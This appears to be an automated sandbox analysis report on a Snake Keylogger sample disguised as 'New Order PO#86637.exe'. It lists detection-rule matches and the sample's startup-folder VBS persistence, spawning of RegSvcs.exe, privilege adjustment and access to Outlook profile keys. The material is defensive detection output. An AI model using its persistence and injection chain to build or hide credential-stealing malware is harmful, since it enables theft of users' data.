                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFE2586_2_04CFE258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFE2576_2_04CFE257
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8B916_2_04CF8B91
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF8BA06_2_04CF8BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFF3B86_2_04CFF3B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFEB086_2_04CFEB08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF93286_2_04CF9328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF0B206_2_04CF0B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B70C06_2_052B70C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052BD7106_2_052BD710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B61206_2_052B6120
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B45006_2_052B4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B35606_2_052B3560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B19406_2_052B1940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B09A06_2_052B09A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B6DA06_2_052B6DA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B51806_2_052B5180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B41E06_2_052B41E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B99C86_2_052B99C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B25C06_2_052B25C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B41D06_2_052B41D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B48206_2_052B4820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B00366_2_052B0036
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B2C006_2_052B2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B1C606_2_052B1C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B00406_2_052B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B64406_2_052B6440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B54A06_2_052B54A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B38806_2_052B3880
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B28E06_2_052B28E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B0CC06_2_052B0CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B2F206_2_052B2F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B13006_2_052B1300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B03606_2_052B0360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B67606_2_052B6760
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B4B406_2_052B4B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B03506_2_052B0350
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B67506_2_052B6750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B3BA06_2_052B3BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B1F806_2_052B1F80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B0FE06_2_052B0FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B57C06_2_052B57C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B16206_2_052B1620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B5E006_2_052B5E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B4E606_2_052B4E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B6A706_2_052B6A70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052BEE486_2_052BEE48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B32406_2_052B3240
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B22A06_2_052B22A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B06806_2_052B0680
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B6A806_2_052B6A80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B5AE06_2_052B5AE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_052B3EC06_2_052B3EC0
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 36 times
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 39 times
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 55 times
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: String function: 004115D7 appears 36 times
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: String function: 00416C70 appears 39 times
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: String function: 00445AE0 appears 55 times
                      Source: New Order PO#86637.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000006.00000002.4535184676.0000000000363000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.name.exe.3740000.1.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.name.exe.3740000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.name.exe.3740000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.name.exe.3740000.1.raw.unpack, B-.csBase64 encoded string: 'Yxx9G1k1Vx3FA0TKFEkiYt3oF5YJ2ut2rc/PxqpuHv7alCYYPONcqB8Tvfg1/Q3g'
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, B-.csBase64 encoded string: 'Yxx9G1k1Vx3FA0TKFEkiYt3oF5YJ2ut2rc/PxqpuHv7alCYYPONcqB8Tvfg1/Q3g'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@8/5
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464EAE
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeFile created: C:\Users\user\AppData\Local\Temp\disturbJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                      Source: New Order PO#86637.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: New Order PO#86637.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeFile read: C:\Users\user\Desktop\New Order PO#86637.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\New Order PO#86637.exe "C:\Users\user\Desktop\New Order PO#86637.exe"
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\New Order PO#86637.exe"
                      Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order PO#86637.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                      Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\New Order PO#86637.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order PO#86637.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: New Order PO#86637.exeStatic file information: File size 1332869 > 1048576
